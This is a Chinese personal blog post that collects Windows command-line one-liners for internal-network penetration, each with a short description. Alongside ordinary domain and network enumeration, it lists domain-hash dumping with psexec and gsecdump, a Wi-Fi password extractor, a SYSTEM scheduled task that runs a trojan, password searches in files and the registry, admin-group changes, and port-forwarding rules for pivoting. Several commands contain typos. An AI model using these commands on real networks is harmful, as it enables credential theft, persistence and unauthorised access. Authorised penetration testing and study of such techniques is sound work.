<!DOCTYPE html>
<html>
<head>
  <title>
    Keyi 的日常  - 内网渗透常用命令 
  </title>
  <meta charset="utf-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1" />

  
  <link rel="shortcut icon" href="/favicon.ico" />
  

  
<link rel="stylesheet" href="/css/style.css">

  <link href="https://google-fonts.mirrors.sjtug.sjtu.edu.cn/css?family=Noto+Sans+SC&display=swap" rel="stylesheet">

  
  

  
<link rel="stylesheet" href="/css/iDisqus.min.css">

  
<script src="/js/iDisqus.min.js"></script>


  <script>
  var disq = new iDisqus('comment', {
      forum: 'pcrab-blog',
      api: 'https://disqus.pcrab.ml',
      site: 'https://fanyibo2009.github.io',
      mode: 1,
      timeout: 3000,
      init: true
  });
  </script>
  
  

  <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="垃圾箱" type="application/atom+xml">
</head>

<body>
  <div class="title">
  <img class="title_img" src="https://fanyibo2009.github.io/images/icon.png"/><br>
  <p id="site_title">&nbspKeyi 的日常&nbsp</p>
</div>

  <div class="navi">
    <a id="navi_item" href="/#" class="menu-item-link">Home</a>
    <a id="navi_item" href="/tags" class="menu-item-link">tags</a>
    <a id="navi_item" href="/about" class="menu-item-link">about</a>
    <a id="navi_item" href="/search" class="menu-item-link">search</a>
</div>

<hr/>


  <div class="main">
    <post>

  <div class="post_title">
    内网渗透常用命令
  </div>

  <br/><br/>

  <div id="post_content">
    <h2 id="1-域常用操作命令"><a href="#1-域常用操作命令" class="headerlink" title="1.域常用操作命令"></a>1.域常用操作命令</h2><table>
<thead>
<tr>
<th align="left"></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td align="left">whoami /all</td>
<td>查看当前域并获取域SID(查看当前用户、权限)</td>
</tr>
<tr>
<td align="left">wmic product get name,version</td>
<td>查看安转的软件及版本信息</td>
</tr>
<tr>
<td align="left">net localgroup administrators</td>
<td>查看本地管理员组（通常包含域用户）</td>
</tr>
<tr>
<td align="left">net session</td>
<td>列出本地计算机与所连接的客户端主机之间的会话</td>
</tr>
<tr>
<td align="left">wmic qfe get Caption,Description,HotFixID,InstalledOn</td>
<td>查看补丁列表</td>
</tr>
<tr>
<td align="left">net share</td>
<td>查看本机共享</td>
</tr>
<tr>
<td align="left">wmic share get name,path,status</td>
<td>查看本机共享</td>
</tr>
<tr>
<td align="left">tasklist / svc</td>
<td>查看本机进程</td>
</tr>
<tr>
<td align="left">wmic process</td>
<td>查看本机进程</td>
</tr>
<tr>
<td align="left">wmic process list brief</td>
<td>查看本机进程</td>
</tr>
<tr>
<td align="left">wmic process get processid,executablepath,name</td>
<td>显示进程的路径、名称、pid</td>
</tr>
<tr>
<td align="left">wmic service list brief</td>
<td>查看本机服务</td>
</tr>
<tr>
<td align="left">wmic startuo get command,caption</td>
<td>查看自启程序列表</td>
</tr>
<tr>
<td align="left">net statistics workstation</td>
<td>查看主机开机时间</td>
</tr>
<tr>
<td align="left">schtasks /query /fo LIST /v</td>
<td>查看计划任务</td>
</tr>
<tr>
<td align="left">net config workstation</td>
<td>判断是否存在域，机器属于哪个域</td>
</tr>
<tr>
<td align="left">net view /domain</td>
<td>查询有几个域, 查询域列表</td>
</tr>
<tr>
<td align="left">net time</td>
<td>查看域</td>
</tr>
<tr>
<td align="left">net time /domian</td>
<td>查询主域服务器的时间</td>
</tr>
<tr>
<td align="left">net group &quot;domain controllers&quot; /domain</td>
<td>查看域控制器组</td>
</tr>
<tr>
<td align="left">nltest /DCLIST:0day</td>
<td>查看域控制器主机名，0day为域名</td>
</tr>
<tr>
<td align="left">nltest /domain_trusts</td>
<td>列出域信任关系</td>
</tr>
<tr>
<td align="left">net group /domain</td>
<td>查看域内用户组列表</td>
</tr>
<tr>
<td align="left">net group &quot;domain Admins&quot; /domain</td>
<td>查看域管理员组</td>
</tr>
<tr>
<td align="left">net group &quot;Enterprise Admins&quot; /domain</td>
<td>查看企业系统管理员组</td>
</tr>
<tr>
<td align="left">net group &quot;Domain Computers&quot; /domain</td>
<td>查看所有的域成员主机</td>
</tr>
<tr>
<td align="left">net group &quot;Domain Controllers&quot; /domain</td>
<td>查看域控制器</td>
</tr>
<tr>
<td align="left">net accounts /domain</td>
<td>获取域密码信息</td>
</tr>
<tr>
<td align="left">net user /domain</td>
<td>查看域用户信息</td>
</tr>
<tr>
<td align="left">net user xxx /domain</td>
<td>查看指定域用户详细信息</td>
</tr>
<tr>
<td align="left">wmic useraccount get /all</td>
<td>获取域内用户详细信息(用户名、描述信息、SID、域名、状态)</td>
</tr>
<tr>
<td align="left">net group qq_group /domain</td>
<td>显示域中qq_group组的成员</td>
</tr>
<tr>
<td align="left">net view /domain:testdomain</td>
<td>查看 testdomain域中的计算机列表</td>
</tr>
<tr>
<td align="left">net user domain-admin /domain</td>
<td>查看管理员登陆时间，密码过期时间，是否有登陆脚本，组分配等信息</td>
</tr>
<tr>
<td align="left">echo %logonserver%</td>
<td>查看登陆到这台服务器的计算机名</td>
</tr>
<tr>
<td align="left">net time \\192.168.1.1</td>
<td>查询远程共享主机192.168.1.1的时间</td>
</tr>
<tr>
<td align="left">net use \\IP\ipc$ password /user:username@domain</td>
<td>ipc$域内连接</td>
</tr>
<tr>
<td align="left">net view \\dc2.0day.org</td>
<td>查看域控共享情况</td>
</tr>
<tr>
<td align="left">dir \\dc2.0day.org /s /a &gt; sysvol.txt</td>
<td>列出sysvol日志记录</td>
</tr>
<tr>
<td align="left">xcopy \\dc2.0day.org\sysvol.txt sysvol.txt /i /e /c</td>
<td>远程拷贝到本地sysvol日志</td>
</tr>
<tr>
<td align="left">net user /domain bk bk123</td>
<td>修改域内用户密码，需要管理员权限</td>
</tr>
<tr>
<td align="left">net localgroup administartors  0day\zhangwei /add</td>
<td>将0day域中的用户zhangwei添加到administrators组中</td>
</tr>
<tr>
<td align="left">mstsc /admin</td>
<td>远程桌面登录到console会话解决hash无法抓出问题</td>
</tr>
<tr>
<td align="left">gpupdate/force</td>
<td>更新域策略</td>
</tr>
<tr>
<td align="left">psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u</td>
<td>从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来</td>
</tr>
<tr>
<td align="left">gsecdump -a</td>
<td>获取域登管理员登录过得hash值，这里gescdump为第三方导出AD域的hash值</td>
</tr>
<tr>
<td align="left">tasklist /S ip /U domain\username /P /V</td>
<td>查看远程计算机进程列表</td>
</tr>
</tbody></table>
<h2 id="2-域常用操作命令"><a href="#2-域常用操作命令" class="headerlink" title="2.域常用操作命令"></a>2.域常用操作命令</h2><table>
<thead>
<tr>
<th align="left"></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td align="left">ipconfig /all</td>
<td>查看IP地址</td>
</tr>
<tr>
<td align="left">ipconfig /release</td>
<td>释放地址</td>
</tr>
<tr>
<td align="left">ipconfig /renew</td>
<td>重新获取Ip地址</td>
</tr>
<tr>
<td align="left">whoami</td>
<td>查询账号所属权限</td>
</tr>
<tr>
<td align="left">whoami /all</td>
<td>查看sid值</td>
</tr>
<tr>
<td align="left">systeminfo</td>
<td>查询系统以及补丁信息</td>
</tr>
<tr>
<td align="left">tasklist /svc</td>
<td>查看进程</td>
</tr>
<tr>
<td align="left">taskkill /im 进程名称(cmd)</td>
<td>结束进程</td>
</tr>
<tr>
<td align="left">taskkill /pid</td>
<td>[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)</td>
</tr>
<tr>
<td align="left">wmic qfe get hotfixid</td>
<td>查看已安装过得补丁，这个很实用</td>
</tr>
<tr>
<td align="left">wmic qfe list full /format:htable &gt; hotfixes.htm</td>
<td>详细的补丁安装</td>
</tr>
<tr>
<td align="left">wmic qfe</td>
<td>查询补丁信息以及微软提供的下载地址</td>
</tr>
<tr>
<td align="left">ping hostname(主机名）</td>
<td>显示该机器名的IP</td>
</tr>
<tr>
<td align="left">net start</td>
<td>查看当前运行的服务</td>
</tr>
<tr>
<td align="left">net user</td>
<td>查看本地组的用户</td>
</tr>
<tr>
<td align="left">net localhroup administrators</td>
<td>查看本机管理员组有哪些用户</td>
</tr>
<tr>
<td align="left">net user</td>
<td>查看会话</td>
</tr>
<tr>
<td align="left">net session</td>
<td>查看当前会话</td>
</tr>
<tr>
<td align="left">net share</td>
<td>查看SMB指向的路径[即共享]</td>
</tr>
<tr>
<td align="left">wmic share get name,path</td>
<td>查看SMB指向的路径</td>
</tr>
<tr>
<td align="left">wmic nteventlog get path,filename,writeable</td>
<td>查询系统日志文件存储位置</td>
</tr>
<tr>
<td align="left">net use \\IP\ipc$ password /user:username</td>
<td>建立IPC会话（工作组模式）</td>
</tr>
<tr>
<td align="left">net use z: \\192.168.1.1</td>
<td>建立映射到本机Z盘</td>
</tr>
<tr>
<td align="left">net time \\172.16.16.2</td>
<td>查询共享主机的是</td>
</tr>
<tr>
<td align="left">at \\172.16.16.2 13:50 c:\windows\2009.exe</td>
<td>在共享主机上执行</td>
</tr>
<tr>
<td align="left">netstat -ano</td>
<td>查看开放的端口</td>
</tr>
<tr>
<td align="left">netstat -an | find &quot;3389&quot;</td>
<td>找到3389端口</td>
</tr>
<tr>
<td align="left">net accounts</td>
<td>查看本地密码策略</td>
</tr>
<tr>
<td align="left">nbtstat –A ip</td>
<td>netbiso查询</td>
</tr>
<tr>
<td align="left">net view</td>
<td>查看机器注释或许能得到当前活动状态的机器列表，如果禁用netbios就查看不出来</td>
</tr>
<tr>
<td align="left">echo %PROCESSOR_ARCHITECTURE%</td>
<td>查看系统是32还是64位</td>
</tr>
<tr>
<td align="left">set</td>
<td>查看系统环境设置变量</td>
</tr>
<tr>
<td align="left">net start</td>
<td>查看当前运行的服务</td>
</tr>
<tr>
<td align="left">wmic service list brief</td>
<td>查看进程服务</td>
</tr>
<tr>
<td align="left">wmic process list brief</td>
<td>查看进程</td>
</tr>
<tr>
<td align="left">wmic startup list brief</td>
<td>查看启动程序信息</td>
</tr>
<tr>
<td align="left">wmic product list brief</td>
<td>查看安装程序和版本信息（漏洞利用线索）</td>
</tr>
<tr>
<td align="left">wmic startup list full</td>
<td>识别开机启动的程序</td>
</tr>
<tr>
<td align="left">wmic process where(description=&quot;mysqld.exe&quot;)&gt;&gt;mysql.log</td>
<td>获取软件安装路径</td>
</tr>
<tr>
<td align="left">for /f &quot;skip=9 tokens=1,2 delims=:&quot; %i in (&#39;netsh wlan showprofiles&#39;) do @echo %j | findstr-i -v echo | netsh wlan show profiles %jkey=clear</td>
<td>一键获取wifi密码</td>
</tr>
<tr>
<td align="left">if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)</td>
<td>查看是否支持posershell</td>
</tr>
<tr>
<td align="left">qwinsta</td>
<td>查看登录情况</td>
</tr>
<tr>
<td align="left">schtasks.exe /Create /RU &quot;SYSTEM&quot; /SC MINUTE /MO 45 /TN FIREWALL /TR &quot;c:/muma.exe&quot; /ED 2017/4/7</td>
<td>添加计划任务</td>
</tr>
<tr>
<td align="left">REG query HKCU /v  &quot;pwd&quot; /s</td>
<td>获取保存到注册表中的密码</td>
</tr>
</tbody></table>
<h3 id="提权补丁"><a href="#提权补丁" class="headerlink" title="提权补丁"></a>提权补丁</h3><table>
<thead>
<tr>
<th>set KB2829361=MS13-046&amp;set KB2830290=MS13-046&amp;setKB2667440=MS12-020&amp;set KB2667402=MS12-020&amp;set KB3124280=MS16-016&amp;setKB3077657=MS15-077&amp;set KB3045171=MS15-051&amp;setKB2592799=MS11-080&amp;set KB952004=MS09-012 PR&amp;set KB956572=MS09-012 巴西烤肉&amp;set KB970483=MS09-020 iis6&amp;set KB2124261=MS10-065 ii7&amp;setKB2271195=MS10-065 ii7&amp;systeminfo&gt;a.txt&amp;(for %i in (KB952004 KB956572KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i &quot;%i&quot;||@echo %%i% Not Installed!)&amp;del /f/q /a a.txt</th>
<th>windows未打补丁情况</th>
</tr>
</thead>
</table>
<h2 id="3-内网网络结常用命令"><a href="#3-内网网络结常用命令" class="headerlink" title="3.内网网络结常用命令"></a>3.内网网络结常用命令</h2><table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>tracert IP</td>
<td>路由跟踪</td>
</tr>
<tr>
<td>route print</td>
<td>打印路由表</td>
</tr>
<tr>
<td>arp -a</td>
<td>列出本网段内所有活跃的IP地址</td>
</tr>
<tr>
<td>arp -s （ip + mac）</td>
<td>绑定mac与ip地址</td>
</tr>
<tr>
<td>arp -d （ip + mac）</td>
<td>解绑mac与ip地址</td>
</tr>
<tr>
<td>nbtscan -r 192.168.16.0/24</td>
<td>通过小工具nbtscan扫描整个网络</td>
</tr>
<tr>
<td>netsh firewall show config</td>
<td>查看防火墙策略</td>
</tr>
<tr>
<td>netsh firewall show state</td>
<td>查看防火墙策略</td>
</tr>
<tr>
<td>for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i &quot;ttl&quot;</td>
<td>批量扫描内网存活主机</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>windows自带端口转发：</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>netsh interface ipv6 install</td>
<td>首先安装IPV6（xp、2003下IPV6必须安装，否则端口转发不可用！）</td>
</tr>
<tr>
<td>netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22</td>
<td>将本机22到1.1.1.1的22</td>
</tr>
<tr>
<td>netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22</td>
<td></td>
</tr>
<tr>
<td>netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=<a target="_blank" rel="noopener" href="http://www.baidu.com">www.baidu.com</a> connectport=22</td>
<td></td>
</tr>
<tr>
<td>netsh interface portproxy show all</td>
<td>查看转发配置</td>
</tr>
<tr>
<td>netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22</td>
<td>删除配置</td>
</tr>
<tr>
<td>netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all</td>
<td>添加防火墙规则，允许连接22：</td>
</tr>
</tbody></table>
<h2 id="4-敏感数据和目录"><a href="#4-敏感数据和目录" class="headerlink" title="4.敏感数据和目录"></a>4.敏感数据和目录</h2><table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>dir /b/s config.*</td>
<td>查看所在目录所有config.为前缀的文件</td>
</tr>
<tr>
<td>findstr /si password *.xml *.ini *.txt</td>
<td>查看后缀名文件中含有password关键字的文件</td>
</tr>
<tr>
<td>findstr /si login *.xml *.ini *.txt</td>
<td>查看后缀名文件中含有login关键字的文件</td>
</tr>
<tr>
<td>copy con 创建命令：</td>
<td></td>
</tr>
<tr>
<td>copy con ftp.bat</td>
<td>创建ftp.bat批处理，然后输入ifconfig等命令，按ctr+z退出，并创建成功</td>
</tr>
<tr>
<td>copy con test.vbs</td>
<td>创建test.vbs脚本，输入脚本后，按ctr+z退出，并创建成功</td>
</tr>
</tbody></table>
<h2 id="5-dsquery的AD查询工具"><a href="#5-dsquery的AD查询工具" class="headerlink" title="5.dsquery的AD查询工具"></a>5.dsquery的AD查询工具</h2><table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>dsquery user domainroot -limit 65535 &amp;&amp; net user /domain</td>
<td>列出该域内所有用户名</td>
</tr>
<tr>
<td>dsquery server -domain super.com | dsget server -dnsname -site</td>
<td>搜索域内所有域控制器并显示他们的DNS主机名和站点名称</td>
</tr>
<tr>
<td>dsquery contact</td>
<td>寻找目录中的联系人</td>
</tr>
<tr>
<td>dsquery subnet</td>
<td>列出该域内网段划分</td>
</tr>
<tr>
<td>query user</td>
<td>查询那些用户在线</td>
</tr>
<tr>
<td>dsquery group &amp;&amp; net group /domain</td>
<td>列出该域内分组</td>
</tr>
<tr>
<td>dsquery ou</td>
<td>列出该域内组织单位</td>
</tr>
<tr>
<td>dsquery server &amp;&amp; net time /domain</td>
<td>列出该域内域控制器</td>
</tr>
<tr>
<td>dsquery site -o rdn</td>
<td>搜索域中所有站点的名称</td>
</tr>
<tr>
<td>dsquery group dc=super,dc=com |more</td>
<td>搜索在DC=SUPER,DC=COM 域中的所有组</td>
</tr>
<tr>
<td>psloggedon.exe</td>
<td>查询那台主机和用户登录到该主机上</td>
</tr>
<tr>
<td>netsess.exe  //192.168.1.115</td>
<td>远程主机上无需管理员权限,查询到主机名和用户</td>
</tr>
<tr>
<td>reg query &quot;HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT&quot;</td>
<td>获取最近mstsc登录的记录</td>
</tr>
</tbody></table>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/243640.html">内网渗透测试：内网信息收集与上传下载</a></p>
<p><a target="_blank" rel="noopener" href="http://www.tiaozhanziwo.com/intranet_penetration/756-2.html">内网渗透命令大全挑战自我博客</a></p>

  </div>

  <br/><br/><br/><br/>

  

  <div class="copyright" >

    <a class="license-image" rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by
-nc
-sa
/4.0/"><img alt="知识共享许可协议" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/80x15.png" /></a>

    <div>

      <p>本作品采用

      <a class="license-word-hyper" rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by
-nc
-sa
/4.0/">
        知识共享署名
-非商业性使用
-相同方式共享
4.0 国际许可协议</a>

      进行许可。</p>

    </div>

    </div>


  <div id="top">
    <a href="#">▲</a>
    <a href="#footer">▼</a>
</div>

  


<div id="comment"></div>





</post>

  </div>

  <foot id="footer">
  <hr class="boldline"/>
  <p class="center font">
    &copy - <a target="_blank" rel="noopener" href="https://fanyibo2009.github.io">无尾熊</a> -  2019 -  2021 - Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">hexo</a> 
  </p>
  <br/>
</foot>

</body>
</html>
